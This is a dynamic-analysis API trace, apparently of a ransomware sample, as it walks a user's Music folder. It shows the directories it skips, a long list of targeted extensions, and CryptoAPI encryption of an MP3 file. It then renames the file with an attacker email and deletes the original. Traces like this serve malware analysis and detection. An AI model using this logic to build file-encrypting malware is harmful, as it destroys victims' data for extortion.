	[0192.390] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music") returned="C:\\Users\\RDhJ0CNFevzX\\Music"
	[0192.390] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\"
	[0192.390] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\", lpString2="4 WeFFAYw8qt-MRv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv"
	[0192.390] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv"
	[0192.390] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\"
	[0192.390] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\"
	[0192.390] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\*.*"
	[0192.390] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8849dad0, ftCreationTime.dwHighDateTime=0x1d9741f, ftLastAccessTime.dwLowDateTime=0x1afbe8b0, ftLastAccessTime.dwHighDateTime=0x1d97451, ftLastWriteTime.dwLowDateTime=0x1afbe8b0, ftLastWriteTime.dwHighDateTime=0x1d97451, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0192.391] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\*.*") returned 48
	[0192.391] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0192.391] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\*.*", cchLength=0x30 | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*") returned 0x30
	[0192.391] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.391] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*", lpSrch="windows") returned 0x0
	[0192.392] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.392] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*", lpSrch="boot") returned 0x0
	[0192.392] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.392] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*", lpSrch="system volume information") returned 0x0
	[0192.392] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.392] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0192.392] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.393] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*", lpSrch="temp") returned 0x0
	[0192.393] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.408] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*", lpSrch="program files") returned 0x0
	[0192.408] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.409] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*", lpSrch="program files (x86)") returned 0x0
	[0192.409] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.409] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*", lpSrch="appdata") returned 0x0
	[0192.409] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.409] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*", lpSrch="application data") returned 0x0
	[0192.409] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.410] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*", lpSrch="winnt") returned 0x0
	[0192.410] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.410] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*", lpSrch="tmp") returned 0x0
	[0192.410] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.410] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*", lpSrch="cache") returned 0x0
	[0192.410] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.410] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*", lpSrch="temporary internet files") returned 0x0
	[0192.410] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.411] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*", lpSrch="webcache") returned 0x0
	[0192.411] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.411] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*", lpSrch="inetcache") returned 0x0
	[0192.411] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.411] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*", lpSrch="nvidia") returned 0x0
	[0192.411] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.411] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*", lpSrch="packages") returned 0x0
	[0192.412] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.412] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*", lpSrch="cookies") returned 0x0
	[0192.412] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.412] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\*.*", lpSrch="programdata") returned 0x0
	[0192.412] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8849dad0, ftCreationTime.dwHighDateTime=0x1d9741f, ftLastAccessTime.dwLowDateTime=0x1afbe8b0, ftLastAccessTime.dwHighDateTime=0x1d97451, ftLastWriteTime.dwLowDateTime=0x1afbe8b0, ftLastWriteTime.dwHighDateTime=0x1d97451, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0192.412] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbe42810, ftCreationTime.dwHighDateTime=0x1d9667c, ftLastAccessTime.dwLowDateTime=0x4b761f80, ftLastAccessTime.dwHighDateTime=0x1d96bb7, ftLastWriteTime.dwLowDateTime=0x4b761f80, ftLastWriteTime.dwHighDateTime=0x1d96bb7, nFileSizeHigh=0x0, nFileSizeLow=0x1677f, dwReserved0=0x0, dwReserved1=0x0, cFileName="3HNghp4U.mp3", cAlternateFileName="")) returned 1
	[0192.412] lstrcmpW (lpString1="3HNghp4U.mp3", lpString2="..") returned 1
	[0192.413] lstrcmpW (lpString1="3HNghp4U.mp3", lpString2=".") returned 1
	[0192.413] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\"
	[0192.413] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\", lpString2="3HNghp4U.mp3" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\3HNghp4U.mp3") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\3HNghp4U.mp3"
	[0192.413] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\3HNghp4U.mp3") returned 57
	[0192.413] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0192.413] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\3HNghp4U.mp3", cchLength=0x39 | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\3hnghp4u.mp3") returned 0x39
	[0192.413] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.414] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\3hnghp4u.mp3", lpSrch="help_decrypt_your_files") returned 0x0
	[0192.414] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\3hnghp4u.mp3" | out: lpString1="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\3hnghp4u.mp3") returned="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\3hnghp4u.mp3"
	[0192.414] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\3hnghp4u.mp3") returned 57
	[0192.414] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0192.414] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.414] StrStrW (lpFirst=".mp3", lpSrch=".") returned=".mp3"
	[0192.415] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.415] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".mp3") returned=".mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0192.415] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0192.415] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0192.415] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\3hnghp4u.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\3hnghp4u.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0192.421] ReadFile (in: hFile=0x2c0, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x1677f, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x1677f, lpOverlapped=0x0) returned 1
	[0192.428] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.428] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcae68) returned 1
	[0192.430] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.430] CryptCreateHash (in: hProv=0xfcae68, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0192.430] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.431] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0192.431] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.431] CryptDeriveKey (in: hProv=0xfcae68, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb95b0) returned 1
	[0192.431] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.431] CryptEncrypt (in: hKey=0xfb95b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x1677f, dwBufLen=0x1677f | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x16780) returned 1
	[0192.434] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0192.434] RtlMoveMemory (in: Destination=0xff3908, Source=0xfdd180, Length=0x1677f | out: Destination=0xff3908) 
	[0192.434] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.434] CryptEncrypt (in: hKey=0xfb95b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff3908*, pdwDataLen=0x18aefc*=0x1677f, dwBufLen=0x16780 | out: pbData=0xff3908*, pdwDataLen=0x18aefc*=0x16780) returned 1
	[0192.434] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.435] CryptDestroyKey (hKey=0xfb95b0) returned 1
	[0192.435] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.435] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0192.435] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.435] CryptReleaseContext (hProv=0xfcae68, dwFlags=0x0) returned 1
	[0192.435] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0192.435] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0192.436] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.436] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0192.437] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\3hnghp4u.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 99
	[0192.437] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\3hnghp4u.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\3hnghp4u.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0192.438] WriteFile (in: hFile=0x388, lpBuffer=0xff3908*, nNumberOfBytesToWrite=0x16780, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xff3908*, lpNumberOfBytesWritten=0x18b358*=0x16780, lpOverlapped=0x0) returned 1
	[0192.444] CloseHandle (hObject=0x388) returned 1
	[0192.445] CloseHandle (hObject=0x2c0) returned 1
	[0192.445] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\3hnghp4u.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\3hnghp4u.mp3")) returned 1
	[0192.453] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\3hnghp4u.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\3hnghp4u.mp3")) returned 0
	[0192.453] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf465d540, ftCreationTime.dwHighDateTime=0x1d967bb, ftLastAccessTime.dwLowDateTime=0x54b4ee30, ftLastAccessTime.dwHighDateTime=0x1d974b0, ftLastWriteTime.dwLowDateTime=0x54b4ee30, ftLastWriteTime.dwHighDateTime=0x1d974b0, nFileSizeHigh=0x0, nFileSizeLow=0x155f9, dwReserved0=0x0, dwReserved1=0x0, cFileName="6ZWJ25wazy74J0wDnF.m4a", cAlternateFileName="6ZWJ25~1.M4A")) returned 1
	[0192.453] lstrcmpW (lpString1="6ZWJ25wazy74J0wDnF.m4a", lpString2="..") returned 1
	[0192.453] lstrcmpW (lpString1="6ZWJ25wazy74J0wDnF.m4a", lpString2=".") returned 1
	[0192.453] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\"
	[0192.454] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\", lpString2="6ZWJ25wazy74J0wDnF.m4a" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\6ZWJ25wazy74J0wDnF.m4a") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\6ZWJ25wazy74J0wDnF.m4a"
	[0192.454] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\6ZWJ25wazy74J0wDnF.m4a") returned 67
	[0192.454] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0192.454] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\6ZWJ25wazy74J0wDnF.m4a", cchLength=0x43 | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\6zwj25wazy74j0wdnf.m4a") returned 0x43
	[0192.454] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0192.454] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\6zwj25wazy74j0wdnf.m4a", lpSrch="help_decrypt_your_files") returned 0x0
